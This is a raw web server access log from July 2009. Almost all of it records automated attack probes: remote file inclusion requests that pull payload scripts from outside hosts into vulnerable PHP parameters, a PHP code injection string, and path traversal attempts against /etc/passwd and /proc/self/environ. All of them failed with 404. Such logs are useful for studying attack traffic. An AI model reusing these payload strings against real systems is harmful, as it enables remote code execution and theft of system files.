89.234.63.107 - - [12/Jul/2009:03:52:30 -0400] "GET /logs/access_log.Q109070200%20%20/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:53:12 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:03:53:12 -0400] "GET //skin/zero_vote/error.php?dir=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:03:53:12 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:03:53:37 -0400] "GET /logs/error_log.Q109060500//skin/zero_vote/error.php?dir=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
91.121.89.135 - - [12/Jul/2009:03:54:01 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:03:54:01 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:03:54:01 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:03:54:01 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:54:05 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:03:54:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.110.97.12 - - [12/Jul/2009:03:55:46 -0400] "GET /errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.110.97.12 - - [12/Jul/2009:03:55:54 -0400] "GET /logs/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.110.97.12 - - [12/Jul/2009:03:55:54 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.110.97.12 - - [12/Jul/2009:03:56:09 -0400] "GET /errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.110.97.12 - - [12/Jul/2009:03:56:11 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.110.97.12 - - [12/Jul/2009:03:56:17 -0400] "GET /logs/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.254.241.12 - - [12/Jul/2009:03:56:41 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:03:57:04 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
94.23.20.159 - - [12/Jul/2009:03:57:08 -0400] "GET /forum.php?act=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.23.20.159 - - [12/Jul/2009:03:57:08 -0400] "GET /logs/forum.php?act=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.23.20.159 - - [12/Jul/2009:03:57:09 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
94.23.20.159 - - [12/Jul/2009:03:57:09 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
94.23.20.159 - - [12/Jul/2009:03:57:09 -0400] "GET /forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
94.23.20.159 - - [12/Jul/2009:03:57:09 -0400] "GET /logs/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
94.23.20.159 - - [12/Jul/2009:03:57:09 -0400] "GET /forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
94.23.20.159 - - [12/Jul/2009:03:57:09 -0400] "GET /logs/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
193.254.241.12 - - [12/Jul/2009:03:57:34 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
91.121.89.135 - - [12/Jul/2009:03:57:59 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:03:57:59 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:03:58:08 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:03:58:08 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:03:58:09 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:03:58:09 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:59:12 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:59:12 -0400] "GET /logs/access_log.Q109053100//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:59:12 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:59:12 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:59:12 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:59:13 -0400] "GET /logs/access_log.Q109053100%20%20//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:04:00:23 -0400] "GET /logs/access_log.Q109070200/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:00:26 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:00:26 -0400] "GET /logs/access_log.Q109053100//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:00:26 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.110.97.12 - - [12/Jul/2009:04:00:32 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:00:35 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:00:35 -0400] "GET /logs/access_log.Q109053100//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:00:37 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:00:37 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:00:37 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:00:40 -0400] "GET /logs/access_log.Q109053100//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:01:06 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:01:06 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:01:11 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:01:11 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:01:13 -0400] "GET /logs/access_log.Q109053100%20%20//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:01:18 -0400] "GET /logs/access_log.Q109053100%20%20//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:02:04 -0400] "GET //sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:02:07 -0400] "GET /logs//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:04:02:07 -0400] "GET /logs/access_log.Q109053100//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.222.13.89 - - [12/Jul/2009:04:03:12 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r0x-id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:04:03:31 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
74.63.91.170 - - [12/Jul/2009:04:03:38 -0400] "GET /logs/access_log.Q109053100%20%20//sources/template.php?CONFIG[main_path]=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:04:03:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [12/Jul/2009:04:04:27 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:04:04:27 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:04:04:27 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:04:04:38 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.149.163.198 - - [12/Jul/2009:04:04:55 -0400] "GET /logs/access_log.Q109051100//bbshop/shop/main.php?_shop_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 246 "-" "Advanced Browser (http://www.avantbrowser.com)"
62.149.163.198 - - [12/Jul/2009:04:04:55 -0400] "GET //bbshop/shop/main.php?_shop_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 219 "-" "Advanced Browser (http://www.avantbrowser.com)"
62.149.163.198 - - [12/Jul/2009:04:04:55 -0400] "GET /logs//bbshop/shop/main.php?_shop_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 224 "-" "Advanced Browser (http://www.avantbrowser.com)"
62.149.163.198 - - [12/Jul/2009:04:04:55 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [12/Jul/2009:04:04:55 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [12/Jul/2009:04:04:55 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [12/Jul/2009:04:04:56 -0400] "GET //bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 219 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:04:04:56 -0400] "GET /logs/access_log.Q109051100//bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 246 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:04:04:56 -0400] "GET /logs//bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 224 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:04:04:56 -0400] "GET //bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 219 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:04:04:56 -0400] "GET /logs/access_log.Q109051100//bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 246 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:04:04:56 -0400] "GET /logs//bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "XXXXXX"
72.30.78.244 - - [12/Jul/2009:04:07:15 -0400] "GET /logs/error_log.Q108122100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.163.198 - - [12/Jul/2009:04:07:16 -0400] "GET /logs/error_log.Q109051100//bbshop/shop/main.php?_shop_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 245 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
62.149.163.198 - - [12/Jul/2009:04:07:16 -0400] "GET /logs/error_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [12/Jul/2009:04:07:16 -0400] "GET /logs/error_log.Q109051100//bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:04:07:16 -0400] "GET /logs/error_log.Q109051100//bbshop/shop/main.php?_shop_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
114.200.199.144 - - [12/Jul/2009:04:07:43 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:07:43 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:07:43 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:07:49 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:07:49 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:07:49 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.22 - - [12/Jul/2009:04:08:39 -0400] "GET /logs/access_log.Q109060600/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:04:08:39 -0400] "GET /logs/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:04:08:39 -0400] "GET /index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jul/2009:04:08:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.22 - - [12/Jul/2009:04:08:45 -0400] "GET /logs/access_log.Q109060600/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:04:08:45 -0400] "GET /index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:04:08:45 -0400] "GET /logs/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
128.241.195.146 - - [12/Jul/2009:04:09:14 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dangblues.com/images/sistem.jpg??? HTTP/1.0" 404 238 "-" "libwww-perl/5.50"
77.221.130.22 - - [12/Jul/2009:04:09:17 -0400] "GET /logs/access_log.Q109061700/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:04:09:17 -0400] "GET /logs/access_log.Q109061700/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
114.200.199.144 - - [12/Jul/2009:04:09:28 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:09:28 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:09:28 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:09:30 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:10:15 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.68.247 - - [12/Jul/2009:04:10:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013410490FC476006961011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.200.199.144 - - [12/Jul/2009:04:10:40 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
128.241.195.146 - - [12/Jul/2009:04:10:50 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dangblues.com/images/sistem.jpg??? HTTP/1.0" 404 265 "-" "libwww-perl/5.50"
128.241.195.146 - - [12/Jul/2009:04:10:50 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dangblues.com/images/sistem.jpg??? HTTP/1.0" 404 238 "-" "libwww-perl/5.50"
128.241.195.146 - - [12/Jul/2009:04:10:51 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dangblues.com/images/sistem.jpg??? HTTP/1.0" 404 243 "-" "libwww-perl/5.50"
84.207.17.120 - - [12/Jul/2009:04:10:54 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:10:55 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:10:55 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
114.200.199.144 - - [12/Jul/2009:04:12:06 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:04:12:06 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:12:35 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:12:35 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:12:35 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:12:35 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.22 - - [12/Jul/2009:04:13:22 -0400] "GET /logs/access_log.Q109060600%20/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:04:13:23 -0400] "GET /logs/access_log.Q109060600%20/index.php?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.101.70.1 - - [12/Jul/2009:04:13:29 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
